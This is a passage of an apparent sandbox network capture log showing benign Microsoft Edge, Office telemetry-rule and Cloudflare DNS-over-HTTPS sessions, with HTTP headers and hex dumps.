                                                                                                                                                                                                        2024-12-04 12:53:19 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        16192.168.2.74972113.107.9.1584437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:20 UTC427OUTGET /work/api/v2/tenant/my/settingswithflights?&clienttype=edge-omnibox HTTP/1.1
                                                                                                                                                                                                        Host: business.bing.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC766INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                        Content-Length: 578
                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                        nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                        report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://bzib.nelreports.net/api/report?cat=bingbusiness"}]}
                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 0F97000661AD402DB27A6BD8EC1E7F2F Ref B: BL2AA2010202009 Ref C: 2024-12-04T12:53:20Z
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:20 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC578INData Raw: 7b 22 74 65 6e 61 6e 74 53 65 74 74 69 6e 67 73 22 3a 7b 22 66 72 69 65 6e 64 6c 79 4e 61 6d 65 22 3a 22 22 2c 22 74 65 6e 61 6e 74 4f 62 6a 65 63 74 49 64 22 3a 22 22 2c 22 74 65 6e 61 6e 74 49 64 22 3a 22 22 2c 22 74 65 6e 61 6e 74 44 69 73 70 6c 61 79 4e 61 6d 65 22 3a 22 22 2c 22 69 63 6f 6e 4c 61 72 67 65 22 3a 22 22 2c 22 69 63 6f 6e 4c 61 72 67 65 43 68 65 63 6b 73 75 6d 22 3a 22 22 2c 22 74 68 65 6d 65 22 3a 22 22 2c 22 61 64 6d 69 6e 45 6d 61 69 6c 22 3a 22 22 2c 22 69 63 6f 6e 4c 61 72 67 65 49 73 44 65 66 61 75 6c 74 22 3a 66 61 6c 73 65 2c 22 74 65 6e 61 6e 74 47 72 6f 75 70 22 3a 22 22 2c 22 73 74 61 74 75 73 22 3a 22 43 6f 6d 70 6c 65 74 65 22 2c 22 76 61 72 69 61 6e 74 73 22 3a 5b 5d 2c 22 65 78 70 6c 6f 72 65 51 75 65 72 69 65 73 22 3a 5b
                                                                                                                                                                                                        Data Ascii: {"tenantSettings":{"friendlyName":"","tenantObjectId":"","tenantId":"","tenantDisplayName":"","iconLarge":"","iconLargeChecksum":"","theme":"","adminEmail":"","iconLargeIsDefault":false,"tenantGroup":"","status":"Complete","variants":[],"exploreQueries":[


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        17192.168.2.74972213.107.9.1584437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:20 UTC418OUTGET /api/v1/user/token/microsoftgraph?&clienttype=edge-omnibox HTTP/1.1
                                                                                                                                                                                                        Host: business.bing.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC629INHTTP/1.1 401 Unauthorized
                                                                                                                                                                                                        WWW-Authenticate: Bearer
                                                                                                                                                                                                        WWW-Authenticate: Bearer
                                                                                                                                                                                                        WWW-Authenticate: Bearer error="invalid_token"
                                                                                                                                                                                                        WWW-Authenticate: Bearer error="invalid_token"
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                        X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                        X-MSEdge-Ref: Ref A: 687E30D5264546CF89CC7AB8516A89A2 Ref B: BL2AA2010205021 Ref C: 2024-12-04T12:53:20Z
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:20 GMT
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 0


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        18192.168.2.74972494.245.104.564437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:20 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                        Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:20 GMT
                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                        Set-Cookie: ARRAffinity=d02bbdfb38a3f3f0c34565cb238c43408ab090e80f763b024b52e05b2d4ae577;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                        Set-Cookie: ARRAffinitySameSite=d02bbdfb38a3f3f0c34565cb238c43408ab090e80f763b024b52e05b2d4ae577;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                        Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                        X-Powered-By: ASP.NET


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        19192.168.2.74972713.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 469
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                        x-ms-request-id: b5189c33-801e-008c-34cb-457130000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125321Z-1746fd949bdb8xvchC1EWRmbd4000000012g00000000becx
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        20192.168.2.74972813.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 415
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                        x-ms-request-id: 16655d81-601e-0084-07c4-456b3f000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125321Z-1746fd949bdmv56chC1EWRypnn00000001a00000000097q0
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        21192.168.2.74972913.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 464
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                        x-ms-request-id: 431871c3-501e-0047-55cc-45ce6c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125321Z-1746fd949bdzd2qvhC1EWRcygw00000000xg0000000080bw
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                        22192.168.2.74973113.107.246.63443
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                        Content-Length: 494
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                        x-ms-request-id: 9b0204ab-501e-0047-62c1-45ce6c000000
                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                        x-azure-ref: 20241204T125321Z-1746fd949bdjzh7thC1EWR3g640000000180000000007gaz
                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        23192.168.2.749732162.159.61.34437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8ecbf05c7afd7cac-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2a 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom*Hc)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        24192.168.2.749734162.159.61.34437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                        CF-RAY: 8ecbf05c7dbb729e-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 21 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom! c)


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        25192.168.2.749733172.64.41.34437688C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                        2024-12-04 12:53:21 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                        2024-12-04 12:53:22 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        Date: Wed, 04 Dec 2024 12:53:21 GMT
